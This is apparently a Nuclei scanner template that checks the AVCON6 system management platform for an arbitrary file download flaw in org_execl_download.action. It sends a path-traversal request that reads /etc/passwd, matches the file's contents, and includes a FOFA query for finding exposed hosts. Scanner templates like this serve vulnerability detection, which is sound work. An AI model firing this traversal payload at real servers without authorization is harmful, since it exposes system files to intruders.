id: avcon6-execl-lfi

info:
  name: AVCON6 org_execl_download.action - Arbitrary File Download
  author: DhiyaneshDk
  severity: high
  description: |
    Arbitrary File Download vulnerability in the org_execl_download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="AVCON-6"
  tags: avcon6,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename="
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eaa90517c720b3cae2b5f89495ef7642cb0f9e58e8065e35c642c0c6d2e9bcf0022100bdfeaebae5aba8054d65d34351feffb960143a01c1b4a6b319aa28ead7964e45:922c64590222798bb761d5b6d8e72950